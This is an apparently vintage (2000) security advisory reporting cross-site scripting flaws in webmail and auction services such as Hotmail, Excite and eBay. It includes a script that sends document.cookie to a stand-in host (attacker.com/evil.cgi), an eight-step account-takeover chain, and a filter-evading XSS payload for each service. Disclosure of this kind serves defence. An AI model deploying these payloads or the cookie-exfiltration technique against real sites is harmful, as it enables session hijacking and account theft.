-Web Application Security Survey-
Results show that Microsoft Hotmail, Excite, Altavista, E-Bay, Lycos
Netscape WebMail, E-Trade, Infoseek/Go.com and their users are all
currently vulnerable to web based attack.

[disclaimer]
The opinions, ideas and information expressed in the following text are
my own and not of any company. I shall not be held liable in anyway
from the  direct or indirect use or misuse of this information. This
data is for informational, and security research purposes. The author
will 
provide no technical support for vulnerabilities stated herein.
If clarification is needed, please contact the appropriate vendor.


[intro]
The following report is the result of a two hour security survey of
high profile webmail and auction services offered free over
the internet. This survey is in no way extensive or thorough.
It serves only as "proof of concept" that these types of services
are vulnerable to attack on a wide scale. All the following
vulnerabilities are currently active as of Aug. 25, 2000.

Please note that the following vulnerabilities are NOT new and have
been 
posted publicly for weeks if not months either by myself or others.

[background and proof of concept]
The following webmail vulnerabilities all stem from the same problem.
The attacker has the ability to pass unfiltered malicious
HTML/JavaScript into the target users web environment. This means that
the attacker can write code and send to the user to be then executed on
the client side. Whatever is within the reach of javascript access, now
the attacker is also able to access remotely. What sensitive things
does javascript/the attacker have access to within the browser?

1) Browser Cookies
2) Document Location
3) Browser and System Settings
4) Client Host Network Information

The above are the most prominent and sensitive information contained.

The focus of the following vulnerabilities only apply to #1
(Browser Cookies). Most if not all webmail services use cookie data
for authentication. If the attacker were to compromise the cookie
data of the user, the account can now be accessed. Simply, if
the attacker can pilfer the cookie data, they can substitute that
cookie
into their own browser and authenticate without the knowledge of a 
username/password being necessary.Thus the attacker has become the
target user until the session runs out. Variants may be required to
achieve maximum results. Remember, this is only  proof of concept.

Also worth mention is that the attacker may use any browser specific
vulnerabilites requiring the use of JavaScript. Such vulnerabilities
as browser cache exploits, history exploits, and others.

How does the attacker bypass browser cookie security to move the cookie
data off the intended cookie domain to another? Good Question.

Let's say that the attacker is able to execute arbitrary
HTML/JavaScript
on the target user's machine. We now know the javascript has access to
the
cookie strings on the executed domain. The attacker using javascript
can
issue a "GET" request, say though the use of an "IMG" tag or webpage
request,
appending the cookie string to the end of the request.

<SCRIPT>
document.sender.src = "http://www.attacker.com/evil.cgi/" +
document.cookie;
</SCRIPT>
<IMG NAME=sender SRC="some_image.gif">

which in essence becomes:
<IMG NAME=sender
SRC="http://www.attacker.com/evil.cgi/users_cookie_data">

Making it even harder to detect, a 1 pixel by 1 pixel image would also
work.
This can all happen quickly on the fly with javascript in many varying
ways.

The rest of the document relies on this principal flaw. If an attacker
can cause the user to view unrestricted arbitrary HTML/JavaScript
within
their environment, the account is vulnerable.  This is the general
premise.

To summarize lets follow the chain of events.
1) Attacker sends a crafted HTML/Javascript email to his target.
2) User signs into whatever service and is assigned an authentication
cookie.
3) User reads attacker's email.
4) User's Cookie is secretly sent to attackers CGI via an invisible GET

request.
5) User continues on, never being the wiser.
6) Attacker checks his CGI logs and finds the cookie string.
7) Attacker places the victims cookie in his/her own cookie file
8) Logs onto service with users account.

Simple.

[affected]
The following companies were not picked by any other method other than
that
they have free webmail or auction services and a large user base.

Microsoft Hotmail       http://www.hotmail.com/
Excite Mail             http://inbox.excite.com/
Altavista Mail          http://www.altavista.com/
E-Bay Chat Forums       http://www.ebay.com/
Lycos                   http://comm.lycos.com/
Netscape WebMail        http://home.netscape.com/webmail/index-f.html
E-Trade Mail            http://www.etrade.com
Infoseek/Go.com         http://register.go.com/

Anyone on the list not mentioned does not mean that they are not
vulnerable. Only that they havent been looked at.

[vulnerability]
All the following vulnerabilities rely on sending HTML Mail to target
user. The following information is for example purposes only and not a
complete account compromise (not required for point demonstration). All
that is shown is that the embedded JavaScript code will use an alert
dialog window to display cookie data to the user. Anything you do to go
further with the exploitation is of your own accord.

 ******EXAMPLE******
MIME-Version: 1.0
From: hacker <hacker@getyou.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: The Example
<HTML><BODY>

INSERT EXPLOIT HERE

</BODY></HTML>
.
 *******************
=======================================================================
Microsoft Hotmail
 Vulnerable to: "HTML Entity"
 Exploit: 

<!-- REMOVE THE OFFENDING SLASH -->
<IMG SRC="javas&\#09;cript:alert(document.cookie);">
=======================================================================
Excite Mail
 Vulnerable to: "Multi-Line Break IMG SRC JavaScript Execute"
 Exploit:  
 <IMG SRC="j

avascr

ipt:ale

rt(document.cookie);">
=======================================================================
Altavista
 Vulnerable to: "HTML Entity"
 Exploit: 

<!-- REMOVE THE OFFENDING SLASH -->
<IMG SRC="javas&\#09;cript:alert(document.cookie);">
=======================================================================
E-Bay Chat Forums
 Vulnerable to: "IMG SRC JavaScript Execute"
 Exploit: 
 <IMG SRC="javascript:alert(document.cookie);">
=======================================================================
Lycos/MailCity
 Vulnerable to: "STYLE TYPE JavaScript"
 Exploit: 
<style TYPE="text/javascript">   
alert(document.cookie);
</style>  
=======================================================================
Netscape WebMail (netscape.net)
 Vulnerable to: "STYLE TYPE JavaScript"
 Exploit: 
<style TYPE="text/javascript">   
alert(document.cookie);
</style>  
=======================================================================
E-Trade FreeMail
 Vulnerable to: "STYLE TYPE JavaScript"
 Exploit: 
<IMG SRC="livescript:alert(document.cookie);">

=======================================================================
Infoseek/Go Network Mail
 Vulnerable to: "Multi-Line Break IMG SRC JavaScript Execute"
 Exploit:  
 <IMG SRC="j

avascr

ipt:ale

rt(document.cookie);">
=======================================================================


[Solution]
Vendor: Filter for known JavaScript strings and disallow them from 
entering the users envirornment.

User: Turn off JavaScript until fix has been implamented by vendor.



__________________________________________________
Do You Yahoo!?
Yahoo! Mail - Free email you can access from anywhere!
http://mail.yahoo.com/